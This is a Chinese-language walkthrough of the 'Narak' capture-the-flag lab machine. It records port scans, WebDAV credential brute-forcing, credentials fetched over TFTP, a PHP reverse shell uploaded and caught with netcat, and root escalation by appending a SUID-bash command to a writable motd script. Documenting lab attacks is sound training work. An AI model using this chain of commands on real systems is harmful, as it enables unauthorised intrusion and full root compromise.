Narak 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.129          
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-08 21:28 EDT
Nmap scan report for 192.1.1.129
Host is up (0.00074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:02:D4:D7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds
                                                                                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80 192.1.1.129         
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-08 21:31 EDT
Nmap scan report for 192.1.1.129
Host is up (0.00026s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 00:0C:29:02:D4:D7 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.93 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.1.1.129
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-08 22:23 EDT
Warning: 192.1.1.129 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.1.1.129
Host is up (0.0017s latency).
All 65535 scanned ports on 192.1.1.129 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:02:D4:D7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.76 seconds

Web 查看

查看 Web 界面，和 zong 教相关。查看网页源代码和可点击元素，并且将图像下载下来看看是否有隐写

一开始点击了 do not click，看到了

一开始觉得这里的 ? 是在暗示这里有代码执行的漏洞，尝试 ?cmd=whoami，200 回应但是返回是相同的，尝试 wfuzz 进行模糊测试，依然没得到有效信息

┌──(kali㉿kali)-[~]
└─$ wfuzz -c --hc 200 -w /usr/share/wordlists/wfuzz/general/big.txt http://192.1.1.129/images/666.jpg?FUZZ=something 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz\'s documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.1.1.129/images/666.jpg?FUZZ=something
Total requests: 3024

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                     
=====================================================================


Total time: 0
Processed Requests: 3024
Filtered Requests: 3024
Requests/sec.: 0

根据网址结构顺便看一下 images 路径，不过没什么价值

目录爆破

尝试目录爆破

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.1.1.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64
[sudo] password for kali: 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.1.1.129
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2023/06/08 21:47:41 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 311] [--> http://192.1.1.129/images/]
/webdav               (Status: 401) [Size: 458]
/server-status        (Status: 403) [Size: 276]
Progress: 215649 / 220561 (97.77%)===============================================================
2023/06/08 21:47:53 Finished
===============================================================

得到两个 /images 和 /webdav 目录，前一个已经看过了，而 webdav ，搜索了一下，是一种通信协议，可以进行上传下载文件，或者对上传文件进行操作。尝试访问 webdav，但是弹窗提醒需要用户名和密码，这里一开始是尝试爆破，使用 hydra 工具进行，先使用 cewl 进行字典收集

┌──(kali㉿kali)-[~]
└─$ cewl http://192.1.1.129/ > user.txt

┌──(kali㉿kali)-[~]
└─$ hydra -L user.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt 192.1.1.129 http-get /webdav 
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-08 22:15:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82917 login tries (l:83/p:999), ~5183 tries per task
[DATA] attacking http-get://192.1.1.129:80/webdav
[STATUS] 8637.00 tries/min, 8637 tries in 00:01h, 74280 to do in 00:09h, 16 active
[STATUS] 8794.33 tries/min, 26383 tries in 00:03h, 56534 to do in 00:07h, 16 active

实在太慢了……那就只能考虑一些别的思路，之前目录爆破的时候没加后缀，这次加上常见的后缀

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.1.1.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,zip,sql,rar
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.1.1.129
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              txt,zip,sql,rar
[+] Timeout:                 10s
===============================================================
2023/06/08 22:24:37 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 311] [--> http://192.1.1.129/images/]
/tips.txt             (Status: 200) [Size: 58]
/webdav               (Status: 401) [Size: 458]
/server-status        (Status: 403) [Size: 276]
Progress: 1099441 / 1102805 (99.69%)===============================================================
2023/06/08 22:25:42 Finished
===============================================================

有个 tips.txt ，看一看

给了提示 creds.txt，这个文件并不在主目录下，简单分析猜测可能是在 webdav 里，这里卡了很久，没有合适的思路，爆破又没得到结果，看了眼红队笔记的视频，原来是 nmap 扫描中 UDP 扫描的结果有点问题，这次指定对最常用的端口进行扫描

tftp 渗透

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.1.1.129 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-08 22:28 EDT
Nmap scan report for 192.1.1.129
Host is up (0.00028s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   open|filtered snmptrap
445/udp   closed        microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:02:D4:D7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

tftp 可能开启了，但是不确定，那就直接试试吧

┌──(kali㉿kali)-[~]
└─$ tftp 192.1.1.129 
tftp> ls
?Invalid command
tftp> help
?Invalid command
tftp> ?
Commands may be abbreviated.  Commands are:

connect         connect to remote tftp
mode            set file transfer mode
put             send file
get             receive file
quit            exit tftp
verbose         toggle verbose mode
trace           toggle packet tracing
status          show current status
binary          set mode to octet
ascii           set mode to netascii
rexmt           set per-packet retransmission timeout
timeout         set total retransmission timeout
?               print help information
tftp> get creds.txt
Received 22 bytes in 0.0 seconds

找到了 creds.txt 在本地查看查看其中的内容

┌──(kali㉿kali)-[~]
└─$ cat creds.txt 
eWFtZG9vdDpTd2FyZw==

┌──(kali㉿kali)-[~]
└─$ cat creds.txt | base64 -d
yamdoot:Swarg

使用 cadaver 来进行交互，根据网络搜索的资料，发现可以上传文件，然后在浏览器端进行访问达到反弹 shell 的目的

┌──(kali㉿kali)-[~]
└─$ cadaver http://192.1.1.129/webdav
Authentication required for webdav on server 192.1.1.129:
Username: yamdoot
Password: 
dav:/webdav/> ls
Listing collection `/webdav/`: collection is empty.
dav:/webdav/> ?
Available commands: 
 ls         cd         pwd        put        get        mget       mput       
 edit       less       mkcol      cat        delete     rmcol      copy       
 move       lock       unlock     discover   steal      showlocks  version    
 checkin    checkout   uncheckout history    label      propnames  chexec     
 propget    propdel    propset    search     set        open       close      
 echo       quit       unset      lcd        lls        lpwd       logout     
 help       describe   about      
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/webdav/> pwd
Current collection is `http://192.1.1.129/webdav/`.
dav:/webdav/> put php-reverse-shell.php
Uploading php-reverse-shell.php to `/webdav/php-reverse-shell.php`:
Progress: [=============================>] 100.0% of 5493 bytes succeeded.

getshell

反弹 shell 成功

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1234           
[sudo] password for kali: 
listening on [any] 1234 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.129] 34332
Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 19:36:29 up  1:09,  0 users,  load average: 0.00, 1.14, 1.72
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 4: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/$ sudo -l
sudo -l
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

sudo: 3 incorrect password attempts
www-data@ubuntu:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
narak:x:1000:1000:narak,,,:/home/narak:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
yamdoot:x:1001:1001:,,,:/home/yamdoot:/bin/bash
inferno:x:1002:1002:,,,:/home/inferno:/bin/bash

提权

信息收集

看到有个用户名是 yamdoot，试试有没有可能和之前得到的 webdav 使用的是同一个密码。

www-data@ubuntu:/$ su yamdoot
su yamdoot
Password: Swarg

su: Authentication failure

失败，信息收集 ing

www-data@ubuntu:/$ cd /var/www
cd /var/www
www-data@ubuntu:/var/www$ ls
ls
DavLock  html  webdav
www-data@ubuntu:/var/www$ ls -liah
ls -liah
total 24K
920702 drwxr-xr-x  4 www-data www-data 4.0K Sep 21  2020 .
917591 drwxr-xr-x 12 root     root     4.0K Sep 21  2020 ..
918264 -rwxr-xr-x  1 www-data www-data  12K Sep 21  2020 DavLock
920703 drwxr-xr-x  3 www-data www-data 4.0K Sep 22  2020 html
917601 drwxr-xr-x  2 www-data www-data 4.0K Jun  8 19:36 webdav
www-data@ubuntu:/var/www$ cat DavLock 
cat DavLock
�d�4эh^www-data@ubuntu:/var/www$ cp DavLock ./webdav
cp DavLock ./webdav

看到个奇怪的文件，把它放到 webdav 上，下载到本地。本地查看也没有效信息

www-data@ubuntu:/var/backups$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
www-data@ubuntu:/var/backups$ id 
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/var/backups$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@ubuntu:/var/backups$ export
export
declare -x APACHE_LOCK_DIR="/var/lock/apache2"
declare -x APACHE_LOG_DIR="/var/log/apache2"
declare -x APACHE_PID_FILE="/var/run/apache2/apache2.pid"
declare -x APACHE_RUN_DIR="/var/run/apache2"
declare -x APACHE_RUN_GROUP="www-data"
declare -x APACHE_RUN_USER="www-data"
declare -x INVOCATION_ID="1f3b99dd50fd422fa2154b386d70fd95"
declare -x JOURNAL_STREAM="9:17364"
declare -x LANG="C"
declare -x OLDPWD="/var"
declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
declare -x PWD="/var/backups"
declare -x SHLVL="1"

定时任务、环境变量不存在有效信息，看看 s 权限的文件和可写权限文件

www-data@ubuntu:/var/run$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null                                                                                                                                                                             
/bin/umount                                                                                                                                                                                                       
/bin/mount
/bin/ntfs-3g
/bin/su
/bin/fusermount
/bin/ping
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/vmware-user-suid-wrapper
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/traceroute6.iputils

读写文件中呢

www-data@ubuntu:/var/run$ find / -type f -writable 2>/dev/null
find / -type f -writable 2>/dev/null
/mnt/hell.sh
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/80-esm
/etc/update-motd.d/80-livepatch
/etc/update-motd.d/10-help-text
/etc/apache2/users.password
/var/www/webdav/DavLock
/var/www/webdav/php-reverse-shell.php
/var/www/html/index.html
/var/www/html/style.css
/var/www/html/images/9.jpg
/var/www/html/images/10.jpg
/var/www/html/images/7.jpg
/var/www/html/images/666.jpg
/var/www/html/images/13.jpg
/var/www/html/images/3.jpg
/var/www/html/images/19.jpg
/var/www/html/images/4.jpg
/var/www/html/images/14.jpg
/var/www/html/images/16.jpg
/var/www/html/images/5.jpg
/var/www/html/images/12.jpg
/var/www/html/images/18.jpg
/var/www/html/images/15.jpg
/var/www/html/images/8.jpg
/var/www/html/images/6.jpg
/var/www/html/images/1.jpg
/var/www/html/images/2.jpg
/var/www/html/images/11.jpg
/var/www/html/images/17.jpg
/var/www/html/font.css
/var/www/DavLock
www-data@ubuntu:/var/run$ cat /etc/apache2/users.password
cat /etc/apache2/users.password
yamdoot:webdav:8ef09831d201bd84acb0ef99a4a98a91
www-data@ubuntu:/var/run$ cat /mnt/hell.sh
cat /mnt/hell.sh
#!/bin/bash

echo"Highway to Hell";
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.
www-data@ubuntu:/var/run$ ls -liah /mnt/hell.sh
ls -liah /mnt/hell.sh
920902 -rwxrwxrwx 1 root root 124 Sep 22  2020 /mnt/hell.sh

brainfuck 语言

看到了一个有意思的 sh 文件，看起来语法好奇怪（，并不了解。经过红队笔记的视频，知道了这是 brainfuck 语言，下载 beef 工具

┌──(kali㉿kali)-[~]
└─$ beef bf             
chitragupt

得到了字符串，根据之前的提示，猜测是个密码，根据 passwd 文件中的用户

www-data@ubuntu:/var/run$ su inferno
su inferno
Password: chitragupt

inferno@ubuntu:/var/run$ id
id
uid=1002(inferno) gid=1002(inferno) groups=1002(inferno)
inferno@ubuntu:/var/run$ whoami
whoami
inferno
inferno@ubuntu:/var/run$ uname -a
uname -a
Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
inferno@ubuntu:/var/run$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:02:d4:d7 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.129/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1369sec preferred_lft 1369sec
    inet6 fe80::20c:29ff:fe02:d4d7/64 scope link 
       valid_lft forever preferred_lft forever
inferno@ubuntu:/var/run$ sudo -l
sudo -l
[sudo] password for inferno: chitragupt 

Sorry, user inferno may not run sudo on ubuntu.

用户移动

inferno 用户登录成功

inferno@ubuntu:/var/run$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/bin/umount
/bin/mount
/bin/ntfs-3g
/bin/su
/bin/fusermount
/bin/ping
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/vmware-user-suid-wrapper
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/traceroute6.iputils

信息收集一波

inferno@ubuntu:/var/run$ cd /home
cd /home
inferno@ubuntu:/home$ ls
ls
inferno  narak  yamdoot
inferno@ubuntu:/home$ cd inferno
cd inferno
inferno@ubuntu:~$ ls
ls
user.txt
inferno@ubuntu:~$ cat user.txt
cat user.txt
Flag: {5f95bf06ce19af69bfa5e53f797ce6e2}

inferno@ubuntu:/home$ find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
<not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
/mnt/hell.sh
/home/inferno/.bash_logout
/home/inferno/.bashrc
/home/inferno/.profile
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/80-esm
/etc/update-motd.d/80-livepatch
/etc/update-motd.d/10-help-text

motd 提权

这里的过滤语法最好记住，以后操作会更流畅，此外 motd 也是常见的提权方法

搜索后，按这个手法进行操作，注意这里需要退出后用 ssh 重新登录才能达到目的

inferno@ubuntu:/home$ ls -al /etc/update-motd.d/
ls -al /etc/update-motd.d/
total 36
drwxrwxrwx  2 root root 4096 Sep 21  2020 .
drwxr-xr-x 80 root root 4096 Sep 22  2020 ..
-rwxrwxrwx  1 root root 1220 Apr  9  2018 00-header
-rwxrwxrwx  1 root root 1157 Apr  9  2018 10-help-text
-rwxrwxrwx  1 root root 4251 Apr  9  2018 50-motd-news
-rwxrwxrwx  1 root root  604 Mar 21  2018 80-esm
-rwxrwxrwx  1 root root 3017 Mar 21  2018 80-livepatch
-rwxrwxrwx  1 root root  299 May 18  2017 91-release-upgrade
inferno@ubuntu:/home$ echo "cp /bin/bash /home/inferno/bash && chmod u+s /home/inferno/bash" >> /etc/update-motd.d/00-header

ssh 登录

┌──(kali㉿kali)-[~]
└─$ ssh inferno@192.1.1.129                  
The authenticity of host '192.1.1.129 (192.1.1.129)' can\'t be established.
ED25519 key fingerprint is SHA256:A4qSwLMJMXo/YuhKxw/H/4ezPo8GmE3SuuMQr98X7TU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.129' (ED25519) to the list of known hosts.
inferno@192.1.1.129\'s password: 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

inferno@ubuntu:~$ ./bash -p
bash-4.4# id
uid=1002(inferno) gid=1002(inferno) euid=0(root) groups=1002(inferno)
bash-4.4# whoami
root
bash-4.4# cd /root
bash-4.4# ls
root.txt
bash-4.4# cat root.txt
██████████████████████████████████████████████████████████████████████████████████████████
█░░░░░░██████████░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░█░░░░░░██░░░░░░░░█
█░░▄▀░░░░░░░░░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░▄▀▄▀▄▀▄▀▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░░░░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░████░░▄▀░░███░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░██░░░░░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░░░░░██████████░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░█
██████████████████████████████████████████████████████████████████████████████████████████
                           
                                                                                    
Root Flag: {9440aee508b6215995219c58c8ba4b45}

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/hackinarticles

Jeenali Kothari  : https://www.linkedin.com/in/jeenali-kothari/

+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+
__________________________________

bash-4.4#